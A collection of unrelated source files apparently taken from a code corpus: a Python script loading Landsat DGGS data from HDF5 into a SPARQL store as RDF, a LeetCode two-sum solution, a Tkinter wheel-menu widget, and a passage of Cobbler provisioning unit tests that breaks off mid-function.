:etmBandComponnet a qb:ComponentSpecification ;
qb:dimension :etmBand .
:dggsComponent a qb:ComponentSpecification ;
qb:attribute :dggs .
:dggsCellComponent a qb:ComponentSpecification ;
qb:dimension :dggsCell .
:dggsLevelSquareComponent a qb:ComponentSpecification ;
qb:dimension :dggsLevelSquare .
:dggsLevelPixelComponent a qb:ComponentSpecification ;
qb:dimension :dggsLevelPixel .
:etmBand a qb:AttributeProperty ;
rdfs:label "LandSat ETM observation band"@en;
rdfs:range xsd:integer .
:instrument a qb:AttributeProperty ;
rdfs:range gcmd-instrument:Instrument .
:satellite a qb:AttributeProperty ;
rdfs:range gcmd-platform:PLATFORM .
:time a qb:AttributeProperty ;
rdfs:range xsd:dateTime .
:dggs a qb:AttributeProperty ;
rdfs:range xsd:string .
:dggsCell a owl:DatatypeProperty, qb:DimensionProperty ;
rdfs:range xsd:string .
:dggsLevelSquare a qb:DimensionProperty ;
rdfs:range xsd:integer .
:dggsLevelPixel a qb:DimensionProperty ;
rdfs:range xsd:integer .
""".format(QB=QB, SDMXD=SDMXD, SDMXM=SDMXM, LED=LED, GEO=GEO, SDMXC=SDMXC,
RDF=RDF, RDFS=RDFS, XSD=XSD, OWL=OWL, OGC=OGC)
def slow(generator, suffix, interval=500, total=None):
"""Used to annotate slow generators. Will print progress every ``interval``
yields."""
tot_str = '/' + str(total) if total is not None else ''
for idx, val in enumerate(generator):
if idx % interval == 0:
print('{}{} {}'.format(idx, tot_str, suffix))
yield val
def array_to_png(array):
"""Turn a 2D array into a data: URI filled with PNG goodies :)"""
assert array.ndim == 2
# Convert to PIL image with transparent pixels for masked values
im = toimage(array)
mask = array.mask
if mask.shape:
# Only bother putting in an alpha channel if there are masked values
alpha = toimage(~mask)
im.putalpha(alpha)
else:
assert not mask, 'Need to have some unmasked values'
# Now save to base64-encoded data: URL
fp = BytesIO()
im.save(fp, format='png')
data = b64encode(fp.getvalue()).decode('utf-8')
return 'data:image/png;base64,' + data
def loc_triples(subj, prop, lat, lon):
"""Yield a bunch of triples indicating that something is at a given
latitude and longitude. This is actually really painful because of
blank nodes :("""
loc_bnode = BNode()
yield (subj, prop, loc_bnode)
yield (loc_bnode, GEO.lat, Literal(lat, datatype=XSD.decimal))
yield (loc_bnode, GEO.lon, Literal(lon, datatype=XSD.decimal))
def cell_level_square(cell_id):
"""Get level in DGGS hierarchy associated with slash-separated cell ID.
Maps `/R/0/0/0/0/5` to 5, for instance"""
return len([x for x in cell_id.split('/') if x])
def ident_for_tile(cell_id, level_square, level_pixel, band, meta):
dt = meta['datetime']
url_end = 'observation'
utc = dt.utctimetuple()
url_end += '/{utc.tm_year}/{utc.tm_mon}/{utc.tm_mday}/{utc.tm_hour}' \
'/{utc.tm_min}/{utc.tm_sec}'.format(utc=utc)
url_end += '/cell/' + cell_id.strip('/')
url_end += '/levelSquare-%i' % level_square
url_end += '/levelPixel-%i' % level_pixel
url_end += '/band-%i' % band
return LED[url_end]
def graph_for_data(cell_id, tile, band, meta):
is_pixel = tile.ndim <= 1
if is_pixel:
tile_size = 1
else:
tile_w, tile_h = tile.shape
assert tile_w == tile_h
tile_size = tile_w
# Find level in DGGS hierarchy of current square and current data
level_square = cell_level_square(cell_id)
if is_pixel:
level_pixel = level_square
else:
extra = np.log(tile_size) / np.log(3)
int_extra = int(round(extra))
assert abs(extra - int_extra) < 1e-5, \
'Tile size needs to be power of 3'
level_pixel = level_square + int_extra
ident = ident_for_tile(cell_id, level_square, level_pixel, band, meta)
# Bounding box for the tile, which we'll convert into WKT
bbox_corners = meta['bounds']
loc_wkt = Literal('POLYGON(({0}, {1}, {2}, {3}, {0}))'.format(
*['{} {}'.format(lon, lat) for lon, lat in bbox_corners]
), datatype=OGC.wktLiteral)
# Woooo this resolution calculation makes no sense
maxes = bbox_corners.max(axis=0)
mins = bbox_corners.min(axis=0)
res = np.mean(tile_size / np.abs(maxes - mins))
if is_pixel:
yield from [
(ident, LED.value, Literal(float(tile))),
(ident, RDF.type, LED.Pixel)
]
else:
png_tile = URIRef(array_to_png(tile))
yield from [
(ident, LED.imageData, png_tile),
(ident, RDF.type, LED.GridSquare)
]
# Actual data
yield from [
(ident, RDF.type, QB.Observation),
(ident, QB.dataSet, LED.landsatDS),
(ident, LED.bounds, loc_wkt),
(ident, LED.etmBand, Literal(band, datatype=XSD.integer)),
(ident, LED.time, Literal(meta['datetime'], datatype=XSD.datetime)),
(ident, LED.resolution,
Literal(res, datatype=XSD.decimal)),
(ident, LED.dggsCell, Literal(cell_id)),
(ident, LED.dggsLevelSquare, Literal(level_square)),
(ident, LED.dggsLevelPixel, Literal(level_pixel))
]
# Yield the centre point
centre_lon, centre_lat = meta['centre']
yield from loc_triples(ident, LED.location, centre_lat, centre_lon)
def convert_meta(src_meta):
"""Convert metadata from HDF5 file to native types"""
dest_meta = {}
for k, v in src_meta.items():
if k == 'datetime':
dest_meta[k] = date_parse(v)
else:
dest_meta[k] = v
return dest_meta
def graph_for_cell(cell):
"""Process a single DGGS cell, represented as a h5py group."""
# [()] converts to Numpy array
pixel = cell['pixel'][()]
data = cell['data'][()]
assert pixel.ndim <= 1
if pixel.ndim == 0:
num_bands = 1
assert data.ndim == 2
else:
num_bands = pixel.shape[0]
assert data.ndim == 3 and data.shape[0] == num_bands, \
'Pixel and tile need same channel count'
meta = convert_meta(dict(cell.attrs))
cell_id = cell.name
masked_data = np.ma.masked_values(data, meta['missing_value'])
for band in range(num_bands):
if num_bands > 1:
pixel_band = pixel[band]
masked_data_band = masked_data[band]
else:
pixel_band = pixel
masked_data_band = masked_data
# Sanity checks (masked_data_band must be 2D image, pixel must be
# single number)
assert np.isscalar(pixel_band) or pixel_band.size == 1
assert masked_data_band.ndim == 2
# Both pixel and dense data are treated as "data" (just one has a
# resolution of 1x1)
yield from graph_for_data(cell_id, pixel_band, band, meta)
yield from graph_for_data(cell_id, masked_data_band, band, meta)
def data_cell_ids(hdf5_file):
"""Get list of paths (e.g. ``/R/7/8/5/2/1``) pointing to HDF5 groups
containing actual data."""
to_explore = ['/' + k for k in hdf5_file.keys()]
while to_explore:
top = to_explore.pop()
group = hdf5_file[top]
if 'data' in group:
assert 'pixel' in group, \
'HDF5 groups with `data` members need `pixel` members too'
yield top
# Now add its children
children = [top + '/' + k for k in group.keys()
if isinstance(group[k], h5py.Group)]
to_explore.extend(children)
def build_graph(hdf5_file):
"""Generator producing all observation triples for each band."""
boilerplate_graph = Graph().parse(
StringIO(BOILERPLATE_TURTLE), format='turtle'
)
yield from boilerplate_graph.triples((None, None, None))
# Just throw the data in the HDF5 file straight into our graph. There's no
# need to do fancy slicing like we did for GeoTIFF.
for cell_id in data_cell_ids(hdf5_file):
group = hdf5_file[cell_id]
print('Processing cell {}'.format(cell_id))
yield from graph_for_cell(group)
def iterchunk(iterator, n):
"""Chunk iterator into blocks of size n"""
it = iter(iterator)
while True:
chunk = islice(it, n)
try:
fst = next(chunk)
except StopIteration:
return
yield chain([fst], chunk)
parser = ArgumentParser()
parser.add_argument(
'hdf5_file', type=str, help='Path to DGGS-formatted HDF5 file to load'
)
parser.add_argument(
'--query-url', type=str, default='http://localhost:3030/landsat/query',
dest='query_url', help='Query URL for SPARQL endpoint'
)
parser.add_argument(
'--update-url', type=str, default='http://localhost:3030/landsat/update',
dest='update_url', help='Update URL for SPARQL endpoint'
)
if __name__ == '__main__':
args = parser.parse_args()
with h5py.File(args.hdf5_file, 'r') as hdf5_fp:
graph_triples = build_graph(hdf5_fp)
# Batch the triples so that Python doesn't asplode
for triples in slow(iterchunk(graph_triples, 100), 'chunks'):
fuseki = ConjunctiveGraph(store='SPARQLUpdateStore')
fuseki.open((args.query_url, args.update_url))
fuseki.addN((s, p, o, DEFAULT) for s, p, o in triples)
fuseki.close()
print('Done')
| ANU-Linked-Earth-Data/middleware | batch-demo/import_agdc_data.py | Python | apache-2.0 | 12,109 |
class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
for first in range(len(nums)):
for second in range(len(nums)):
if first == second:
continue
elif (nums[first] + nums[second]) == target:
return [first, second] | kiss7night/LeetCode | 004. Two Sum/solution.py | Python | mit | 417 |
from Tkinter import *
import math
from PIL import ImageTk
from enum import Enum
from lib.SenselGestureFramework.sensel_framework_simple import Direction
WHEEL_SIDE = 200.0
SMALL_WHEEL_SIDE = WHEEL_SIDE/5
LINE_L = WHEEL_SIDE*math.sqrt(2)/4
BACK_COLOR = "#97D6FF"
HIGH_COLOR = "#90FF74"
LINE_COLOR = "#FFFFFF"
LINE_WIDTH = 3
class Action(Enum):
IMAGE = 0
SHAPE = 1
TEXT = 2
def getImages():
return {
Action.IMAGE: PhotoImage(file="fontawesome/pic.gif").subsample(12, 12),
Action.SHAPE: PhotoImage(file="fontawesome/square.gif").subsample(12, 12),
Action.TEXT: PhotoImage(file="fontawesome/text.gif").subsample(12, 12)
}
def convertDirectionToAction(direction):
returnValue = None
if(direction == Direction.UP):
returnValue = Action.TEXT
elif(direction == Direction.LEFT):
returnValue = Action.IMAGE
elif(direction == Direction.RIGHT):
returnValue = Action.SHAPE
return returnValue
class WheelMenu(object):
def __init__ (self, xloc, yloc):
self.xloc = xloc
self.yloc = yloc
self.TR = 0
self.highlight = 0
self.images = getImages()
def changeLoc (self, xloc, yloc):
self.xloc = xloc
self.yloc = yloc
def drawWheel (self, canv):
print LINE_L
self.circ = canv.create_oval(self.xloc - WHEEL_SIDE/2, self.yloc + WHEEL_SIDE/2, self.xloc + WHEEL_SIDE/2, self.yloc - WHEEL_SIDE/2, tags="circle", fill = BACK_COLOR, outline = "")
self.TR = canv.create_line(self.xloc - LINE_L, self.yloc - LINE_L, self.xloc + LINE_L, self.yloc + LINE_L, fill = LINE_COLOR, tags="TRline", width = LINE_WIDTH)
self.TL = canv.create_line(self.xloc + LINE_L, self.yloc - LINE_L, self.xloc - LINE_L, self.yloc + LINE_L, fill = LINE_COLOR, tags="TLline", width = LINE_WIDTH)
self.inner = canv.create_oval(self.xloc - SMALL_WHEEL_SIDE, self.yloc + SMALL_WHEEL_SIDE, self.xloc + SMALL_WHEEL_SIDE, self.yloc - SMALL_WHEEL_SIDE, tags="inner", fill = "white", outline = "")
self.drawImages(canv)
def highlightSide (self, canv, side):
self.circ = canv.create_oval(self.xloc - WHEEL_SIDE/2, self.yloc + WHEEL_SIDE/2, self.xloc + WHEEL_SIDE/2, self.yloc - WHEEL_SIDE/2, tags="circle", fill = BACK_COLOR, outline = "")
self.highlight = canv.create_arc(self.xloc - WHEEL_SIDE/2, self.yloc + WHEEL_SIDE/2, self.xloc + WHEEL_SIDE/2, self.yloc - WHEEL_SIDE/2, tags="circle", fill = HIGH_COLOR, outline = "", start = side-45, extent = 90)
self.TR = canv.create_line(self.xloc - LINE_L, self.yloc - LINE_L, self.xloc + LINE_L, self.yloc + LINE_L, fill = LINE_COLOR, tags="TRline", width = LINE_WIDTH)
self.TL = canv.create_line(self.xloc + LINE_L, self.yloc - LINE_L, self.xloc - LINE_L, self.yloc + LINE_L, fill = LINE_COLOR, tags="TLline", width = LINE_WIDTH)
self.inner = canv.create_oval(self.xloc - SMALL_WHEEL_SIDE, self.yloc + SMALL_WHEEL_SIDE, self.xloc + SMALL_WHEEL_SIDE, self.yloc - SMALL_WHEEL_SIDE, tags="inner", fill = "white", outline = "")
self.drawImages(canv)
def drawImages(self, canvas):
# Draw shapes on each quadrant
canvas.create_image(self.xloc-WHEEL_SIDE/2 + 30, self.yloc, image=self.images[Action.IMAGE])
canvas.create_image(self.xloc+WHEEL_SIDE/2 - 30, self.yloc, image=self.images[Action.SHAPE])
canvas.create_image(self.xloc, self.yloc-WHEEL_SIDE/2 + 30, image=self.images[Action.TEXT])
def clearWheel (self, canv):
if self.TR:
print "ah"
canv.delete(self.TR)
canv.delete(self.TL)
canv.delete(self.circ)
canv.delete(self.inner)
if self.highlight:
canv.delete(self.highlight)
def moveWheel (self, canv, xloc, yloc):
clearWheel(self, canv)
changeLoc(self, self.xloc, self.yloc)
drawWheel(self, canv) | SenselWebDev/SenselWebDeveloper | wheel_menu_framework.py | Python | mit | 3,605 |
# Test cases for Cobbler
#
# Michael DeHaan <mdehaan@redhat.com>
import sys
import unittest
import os
import subprocess
import tempfile
import shutil
import traceback
from cobbler.cexceptions import *
from cobbler import settings
from cobbler import collection_distros
from cobbler import collection_profiles
from cobbler import collection_systems
import cobbler.modules.authz_ownership as authz_module
from cobbler import api
from cobbler import config
from cobbler import utils
utils.TEST_MODE = True
FAKE_INITRD="initrd-2.6.15-1.2054_FAKE.img"
FAKE_INITRD2="initrd-2.5.16-2.2055_FAKE.img"
FAKE_INITRD3="initrd-1.8.18-3.9999_FAKE.img"
FAKE_KERNEL="vmlinuz-2.6.15-1.2054_FAKE"
FAKE_KERNEL2="vmlinuz-2.5.16-2.2055_FAKE"
FAKE_KERNEL3="vmlinuz-1.8.18-3.9999_FAKE"
FAKE_KICKSTART="http://127.0.0.1/fake.ks"
cleanup_dirs = []
class BootTest(unittest.TestCase):
def setUp(self):
# Create temp dir
self.topdir = "/tmp/cobbler_test"
try:
os.makedirs(self.topdir)
except:
pass
self.fk_initrd = os.path.join(self.topdir, FAKE_INITRD)
self.fk_initrd2 = os.path.join(self.topdir, FAKE_INITRD2)
self.fk_initrd3 = os.path.join(self.topdir, FAKE_INITRD3)
self.fk_kernel = os.path.join(self.topdir, FAKE_KERNEL)
self.fk_kernel2 = os.path.join(self.topdir, FAKE_KERNEL2)
self.fk_kernel3 = os.path.join(self.topdir, FAKE_KERNEL3)
self.api = api.BootAPI()
create = [ self.fk_initrd, self.fk_initrd2, self.fk_initrd3,
self.fk_kernel, self.fk_kernel2, self.fk_kernel3 ]
for fn in create:
f = open(fn,"w+")
f.close()
self.make_basic_config()
def tearDown(self):
# only off during refactoring, fix later
shutil.rmtree(self.topdir,ignore_errors=True)
self.api = None
def make_basic_config(self):
distro = self.api.new_distro()
self.assertTrue(distro.set_name("testdistro0"))
self.assertTrue(distro.set_kernel(self.fk_kernel))
self.assertTrue(distro.set_initrd(self.fk_initrd))
self.assertTrue(self.api.add_distro(distro))
self.assertTrue(self.api.find_distro(name="testdistro0"))
profile = self.api.new_profile()
self.assertTrue(profile.set_name("testprofile0"))
self.assertTrue(profile.set_distro("testdistro0"))
self.assertTrue(profile.set_kickstart(FAKE_KICKSTART))
self.assertTrue(self.api.add_profile(profile))
self.assertTrue(self.api.find_profile(name="testprofile0"))
system = self.api.new_system()
self.assertTrue(system.set_name("drwily.rdu.redhat.com"))
self.assertTrue(system.set_mac_address("BB:EE:EE:EE:EE:FF","intf0"))
self.assertTrue(system.set_ip_address("192.51.51.50","intf0"))
self.assertTrue(system.set_profile("testprofile0"))
self.assertTrue(self.api.add_system(system))
self.assertTrue(self.api.find_system(name="drwily.rdu.redhat.com"))
repo = self.api.new_repo()
try:
os.makedirs("/tmp/test_example_cobbler_repo")
except:
pass
fd = open("/tmp/test_example_cobbler_repo/test.file", "w+")
fd.write("hello!")
fd.close()
self.assertTrue(repo.set_name("test_repo"))
self.assertTrue(repo.set_mirror("/tmp/test_example_cobbler_repo"))
self.assertTrue(self.api.repos().add(repo))
class DuplicateNamesAndIpPrevention(BootTest):
"""
The command line (and WebUI) have checks to prevent new system
additions from conflicting with existing systems and overwriting
them inadvertantly. This class tests that code. NOTE: General API
users will /not/ encounter these checks.
"""
def test_duplicate_prevention(self):
# find things we are going to test with
distro1 = self.api.find_distro(name="testdistro0")
profile1 = self.api.find_profile(name="testprofile0")
system1 = self.api.find_system(name="drwily.rdu.redhat.com")
repo1 = self.api.find_repo(name="test_repo")
# make sure we can't overwrite a previous distro with
# the equivalent of an "add" (not an edit) on the
# command line.
distro2 = self.api.new_distro()
self.assertTrue(distro2.set_name("testdistro0"))
self.assertTrue(distro2.set_kernel(self.fk_kernel))
self.assertTrue(distro2.set_initrd(self.fk_initrd))
self.assertTrue(distro2.set_owners("canary"))
# this should fail
try:
self.api.add_distro(distro2,check_for_duplicate_names=True)
self.assertTrue(1==2,"distro add should fail")
except CobblerException:
pass
except:
self.assertTrue(1==2,"exception type")
# we caught the exception but make doubly sure there was no write
distro_check = self.api.find_distro(name="testdistro0")
self.assertTrue("canary" not in distro_check.owners)
# repeat the check for profiles
profile2 = self.api.new_profile()
self.assertTrue(profile2.set_name("testprofile0"))
self.assertTrue(profile2.set_distro("testdistro0"))
# this should fail
try:
self.api.add_profile(profile2,check_for_duplicate_names=True)
self.assertTrue(1==2,"profile add should fail")
except CobblerException:
pass
except:
traceback.print_exc()
self.assertTrue(1==2,"exception type")
# repeat the check for systems (just names this time)
system2 = self.api.new_system()
self.assertTrue(system2.set_name("drwily.rdu.redhat.com"))
self.assertTrue(system2.set_profile("testprofile0"))
# this should fail
try:
self.api.add_system(system2,check_for_duplicate_names=True)
self.assertTrue(1==2,"system add should fail")
except CobblerException:
pass
except:
traceback.print_exc()
self.assertTrue(1==2,"exception type")
# repeat the check for repos
repo2 = self.api.new_repo()
self.assertTrue(repo2.set_name("test_repo"))
self.assertTrue(repo2.set_mirror("http://imaginary"))
# self.failUnlessRaises(CobblerException,self.api.add_repo,[repo,check_for_duplicate_names=True])
try:
self.api.add_repo(repo2,check_for_duplicate_names=True)
self.assertTrue(1==2,"repo add should fail")
except CobblerException:
pass
except:
self.assertTrue(1==2,"exception type")
# now one more check to verify we can't add a system
# of a different name but duplicate netinfo.
system3 = self.api.new_system()
self.assertTrue(system3.set_name("unused_name"))
self.assertTrue(system3.set_profile("testprofile0"))
# MAC is initially accepted
self.assertTrue(system3.set_mac_address("BB:EE:EE:EE:EE:FF","intf3"))
# can't add as this MAC already exists!
#self.failUnlessRaises(CobblerException,self.api.add_system,[system3,check_for_duplicate_names=True,check_for_duplicate_netinfo=True)
try:
self.api.add_system(system3,check_for_duplicate_names=True,check_for_duplicate_netinfo=True)
except CobblerException:
pass
except:
traceback.print_exc()
self.assertTrue(1==2,"wrong exception type")
# set the MAC to a different value and try again
self.assertTrue(system3.set_mac_address("FF:EE:EE:EE:EE:DD","intf3"))
# it should work
self.assertTrue(self.api.add_system(system3,check_for_duplicate_names=True,check_for_duplicate_netinfo=True))
# now set the IP so that collides
self.assertTrue(system3.set_ip_address("192.51.51.50","intf6"))
# this should also fail
# self.failUnlessRaises(CobblerException,self.api.add_system,[system3,check_for_duplicate_names=True,check_for_duplicate_netinfo=True)
try:
self.api.add_system(system3,check_for_duplicate_names=True,check_for_duplicate_netinfo=True)
self.assertTrue(1==2,"system add should fail")
except CobblerException:
pass
except:
self.assertTrue(1==2,"wrong exception type")
# fix the IP and Mac back
self.assertTrue(system3.set_ip_address("192.86.75.30","intf6"))
self.assertTrue(system3.set_mac_address("AE:BE:DE:CE:AE:EE","intf3"))
# now it works again
# note that we will not check for duplicate names as we want
# to test this as an 'edit' operation.
self.assertTrue(self.api.add_system(system3,check_for_duplicate_names=False,check_for_duplicate_netinfo=True))
# FIXME: note -- how netinfo is handled when doing renames/copies/edits
# is more involved and we probably should add tests for that also.
class Ownership(BootTest):
def test_ownership_params(self):
fd = open("/tmp/test_cobbler_kickstart","w+")
fd.write("")
fd.close()
# find things we are going to test with
distro = self.api.find_distro(name="testdistro0")
profile = self.api.find_profile(name="testprofile0")
system = self.api.find_system(name="drwily.rdu.redhat.com")
repo = self.api.find_repo(name="test_repo")
# as we didn't specify an owner for objects, the default
# ownership should be as specified in settings
default_owner = self.api.settings().default_ownership
for obj in [ distro, profile, system, repo ]:
self.assertTrue(obj is not None)
self.assertEquals(obj.owners, default_owner, "default owner for %s" % obj)
# verify we can test things
self.assertTrue(distro.set_owners(["superlab","basement1"]))
self.assertTrue(profile.set_owners(["superlab","basement1"]))
self.assertTrue(profile.set_kickstart("/tmp/test_cobbler_kickstart"))
self.assertTrue(system.set_owners(["superlab","basement1","basement3"]))
self.assertTrue(repo.set_owners([]))
self.api.add_distro(distro)
self.api.add_profile(profile)
self.api.add_system(system)
self.api.add_repo(repo)
# now edit the groups file. We won't test the full XMLRPC
# auth stack here, but just the module in question
authorize = authz_module.authorize
# if the users.conf file exists, back it up for the tests
if os.path.exists("/etc/cobbler/users.conf"):
shutil.copyfile("/etc/cobbler/users.conf","/tmp/cobbler_ubak")
fd = open("/etc/cobbler/users.conf","w+")
fd.write("\n")
fd.write("[admins]\n")
fd.write("admin1 = 1\n")
fd.write("\n")
fd.write("[superlab]\n")
fd.write("superlab1 = 1\n")
fd.write("superlab2 = 1\n")
fd.write("\n")
fd.write("[basement]\n")
fd.write("basement1 = 1\n")
fd.write("basement2 = 1\n")
fd.write("basement3 = 1\n")
fd.close()
xo = self.api.find_distro("testdistro0")
xn = "testdistro0"
ro = self.api.find_repo("test_repo")
rn = "test_repo"
# WARNING: complex test explanation follows!
# we must ensure those who can edit the kickstart are only those
# who can edit all objects that depend on the said kickstart
# in this test, superlab & basement1 can edit test_profile0
# superlab & basement1/3 can edit test_system0
# the systems share a common kickstart record (in this case
# explicitly set, which is a bit arbitrary as they are parent/child
# nodes, but the concept is not limited to this).
# Therefore the correct result is that the following users can edit:
# admin1, superlab1, superlab2
# And these folks can't
# basement1, basement2
# Basement2 is rejected because the kickstart is shared by something
# basmeent2 can not edit.
for user in [ "admin1", "superlab1", "superlab2", "basement1" ]:
self.assertTrue(1==authorize(self.api, user, "modify_kickstart", "/tmp/test_cobbler_kickstart"), "%s can modify_kickstart" % user)
for user in [ "basement2", "dne" ]:
self.assertTrue(0==authorize(self.api, user, "modify_kickstart", "/tmp/test_cobbler_kickstart"), "%s can modify_kickstart" % user)
# ensure admin1 can edit (he's an admin) and do other tasks
# same applies to basement1 who is explicitly added as a user
# and superlab1 who is in a group in the ownership list
for user in ["admin1","superlab1","basement1"]:
self.assertTrue(1==authorize(self.api, user, "save_distro", xo),"%s can save_distro" % user)
self.assertTrue(1==authorize(self.api, user, "modify_distro", xo),"%s can modify_distro" % user)
self.assertTrue(1==authorize(self.api, user, "copy_distro", xo),"%s can copy_distro" % user)
self.assertTrue(1==authorize(self.api, user, "remove_distro", xn),"%s can remove_distro" % user)
# ensure all users in the file can sync
for user in [ "admin1", "superlab1", "basement1", "basement2" ]:
self.assertTrue(1==authorize(self.api, user, "sync"))
# make sure basement2 can't edit (not in group)
# and same goes for "dne" (does not exist in users.conf)
for user in [ "basement2", "dne" ]:
self.assertTrue(0==authorize(self.api, user, "save_distro", xo), "user %s cannot save_distro" % user)
self.assertTrue(0==authorize(self.api, user, "modify_distro", xo), "user %s cannot modify_distro" % user)
self.assertTrue(0==authorize(self.api, user, "remove_distro", xn), "user %s cannot remove_distro" % user)
# basement2 is in the file so he can still copy
self.assertTrue(1==authorize(self.api, "basement2", "copy_distro", xo), "basement2 can copy_distro")
# dne can not copy or sync either (not in the users.conf)
self.assertTrue(0==authorize(self.api, "dne", "copy_distro", xo), "dne cannot copy_distro")
self.assertTrue(0==authorize(self.api, "dne", "sync"), "dne cannot sync")
# unlike the distro testdistro0, testrepo0 is unowned
# so any user in the file will be able to edit it.
for user in [ "admin1", "superlab1", "basement1", "basement2" ]:
self.assertTrue(1==authorize(self.api, user, "save_repo", ro), "user %s can save_repo" % user)
# though dne is still not listed and will be denied
self.assertTrue(0==authorize(self.api, "dne", "save_repo", ro), "dne cannot save_repo")
# if we survive, restore the users file as module testing is done
if os.path.exists("/tmp/cobbler_ubak"):
shutil.copyfile("/etc/cobbler/users.conf","/tmp/cobbler_ubak")
class MultiNIC(BootTest):
def test_multi_nic_support(self):
system = self.api.new_system()
self.assertTrue(system.set_name("nictest"))
self.assertTrue(system.set_profile("testprofile0"))
self.assertTrue(system.set_hostname("zero","intf0"))
self.assertTrue(system.set_mac_address("EE:FF:DD:CC:DD:CC","intf1"))
self.assertTrue(system.set_ip_address("127.0.0.5","intf2"))
self.assertTrue(system.set_dhcp_tag("zero","intf3"))
self.assertTrue(system.set_virt_bridge("zero","intf4"))
self.assertTrue(system.set_gateway("192.168.1.25","intf4"))
self.assertTrue(system.set_mac_address("AA:AA:BB:BB:CC:CC","intf4"))
self.assertTrue(system.set_hostname("fooserver","intf4"))
self.assertTrue(system.set_dhcp_tag("red","intf4"))
self.assertTrue(system.set_ip_address("192.168.1.26","intf4"))
self.assertTrue(system.set_subnet("255.255.255.0","intf4"))
self.assertTrue(system.set_dhcp_tag("tag2","intf5"))
self.assertTrue(self.api.systems().add(system))
# mixing in some higher level API calls with some lower level internal stuff
# just to make sure it's all good.
self.assertTrue(self.api.find_system(hostname="zero"))
self.assertTrue(self.api.systems().find(mac_address="EE:FF:DD:CC:DD:CC"))
self.assertTrue(self.api.systems().find(ip_address="127.0.0.5"))
self.assertTrue(self.api.find_system(virt_bridge="zero"))
self.assertTrue(self.api.systems().find(gateway="192.168.1.25"))
self.assertTrue(self.api.systems().find(subnet="255.255.255.0"))
self.assertTrue(self.api.find_system(dhcp_tag="tag2"))
self.assertTrue(self.api.systems().find(dhcp_tag="zero"))
# verify that systems has exactly 5 interfaces
self.assertTrue(len(system.interfaces.keys()) == 6)
# now check one interface to make sure it's exactly right
# and we didn't accidentally fill in any other fields elsewhere
self.assertTrue(system.interfaces.has_key("intf4"))
for (name,intf) in system.interfaces.iteritems():
if name == "intf4": # xmlrpc dicts must have string keys, so we must also
self.assertTrue(intf["gateway"] == "192.168.1.25")
self.assertTrue(intf["virt_bridge"] == "zero")
self.assertTrue(intf["subnet"] == "255.255.255.0")
self.assertTrue(intf["mac_address"] == "AA:AA:BB:BB:CC:CC")
self.assertTrue(intf["ip_address"] == "192.168.1.26")
self.assertTrue(intf["hostname"] == "fooserver")
self.assertTrue(intf["dhcp_tag"] == "red")
class Utilities(BootTest):
def _expeq(self, expected, actual):
try:
self.failUnlessEqual(expected, actual,
"Expected: %s; actual: %s" % (expected, actual))
except:
self.fail("exception during failUnlessEqual")
def test_kernel_scan(self):
self.assertTrue(utils.find_kernel(self.fk_kernel))
self.assertFalse(utils.find_kernel("filedoesnotexist"))
self._expeq(self.fk_kernel, utils.find_kernel(self.topdir))
def test_initrd_scan(self):
self.assertTrue(utils.find_initrd(self.fk_initrd))
self.assertFalse(utils.find_initrd("filedoesnotexist"))
self._expeq(self.fk_initrd, utils.find_initrd(self.topdir))
def test_kickstart_scan(self):
# we don't check to see if kickstart files look like anything
# so this will pass
self.assertTrue(utils.find_kickstart("filedoesnotexist") is None)
self.assertTrue(utils.find_kickstart(self.topdir) == None)
self.assertTrue(utils.find_kickstart("http://bar"))
self.assertTrue(utils.find_kickstart("ftp://bar"))
self.assertTrue(utils.find_kickstart("nfs://bar"))
self.assertFalse(utils.find_kickstart("gopher://bar"))
def test_matching(self):
self.assertTrue(utils.is_mac("00:C0:B7:7E:55:50"))
self.assertTrue(utils.is_mac("00:c0:b7:7E:55:50"))
self.assertFalse(utils.is_mac("00.D0.B7.7E.55.50"))
self.assertFalse(utils.is_mac("drwily.rdu.redhat.com"))
self.assertTrue(utils.is_ip("127.0.0.1"))
self.assertTrue(utils.is_ip("192.168.1.1"))
self.assertFalse(utils.is_ip("00:C0:B7:7E:55:50"))
self.assertFalse(utils.is_ip("drwily.rdu.redhat.com"))
def test_some_random_find_commands(self):
# initial setup...
self.test_system_name_is_a_MAC()
# search for a parameter that isn't real, want an error
self.failUnlessRaises(CobblerException,self.api.systems().find, pond="mcelligots")
# verify that even though we have several different NICs search still works
self.assertTrue(self.api.systems().find(name="nictest"))
# search for a parameter with a bad value, want None
self.assertFalse(self.api.systems().find(name="horton"))
# one valid parameter another invalid is still an error
self.failUnlessRaises(CobblerException,self.api.systems().find, name="onefish",pond="mcelligots")
# searching with no args is ALSO an error
self.failUnlessRaises(CobblerException, self.api.systems().find)
# searching for a list returns a list of correct length
self.assertTrue(len(self.api.systems().find(mac_address="00:16:41:14:B7:71",return_list=True))==1)
# make sure we can still search without an explicit keyword arg
self.assertTrue(len(self.api.systems().find("00:16:41:14:B7:71",return_list=True))==1)
self.assertTrue(self.api.systems().find("00:16:41:14:B7:71"))
def test_invalid_distro_non_referenced_kernel(self):
distro = self.api.new_distro()
self.assertTrue(distro.set_name("testdistro2"))
self.failUnlessRaises(CobblerException,distro.set_kernel,"filedoesntexist")
self.assertTrue(distro.set_initrd(self.fk_initrd))
self.failUnlessRaises(CobblerException, self.api.distros().add, distro)
self.assertFalse(self.api.distros().find(name="testdistro2"))
def test_invalid_distro_non_referenced_initrd(self):
distro = self.api.new_distro()
self.assertTrue(distro.set_name("testdistro3"))
self.assertTrue(distro.set_kernel(self.fk_kernel))
self.failUnlessRaises(CobblerException, distro.set_initrd, "filedoesntexist")
self.failUnlessRaises(CobblerException, self.api.distros().add, distro)
self.assertFalse(self.api.distros().find(name="testdistro3"))
def test_invalid_profile_non_referenced_distro(self):
profile = self.api.new_profile()
self.assertTrue(profile.set_name("testprofile11"))
self.failUnlessRaises(CobblerException, profile.set_distro, "distrodoesntexist")
self.assertTrue(profile.set_kickstart(FAKE_KICKSTART))
self.failUnlessRaises(CobblerException, self.api.profiles().add, profile)
self.assertFalse(self.api.profiles().find(name="testprofile2"))
def test_invalid_profile_kickstart_not_url(self):
profile = self.api.new_profile()
self.assertTrue(profile.set_name("testprofile12"))
self.assertTrue(profile.set_distro("testdistro0"))
self.failUnlessRaises(CobblerException, profile.set_kickstart, "kickstartdoesntexist")
# since kickstarts are optional, you can still add it
self.assertTrue(self.api.profiles().add(profile))
self.assertTrue(self.api.profiles().find(name="testprofile12"))
# now verify the other kickstart forms would still work
self.assertTrue(profile.set_kickstart("http://bar"))
self.assertTrue(profile.set_kickstart("ftp://bar"))
self.assertTrue(profile.set_kickstart("nfs://bar"))
def test_profile_virt_parameter_checking(self):
profile = self.api.new_profile()
self.assertTrue(profile.set_name("testprofile12b"))
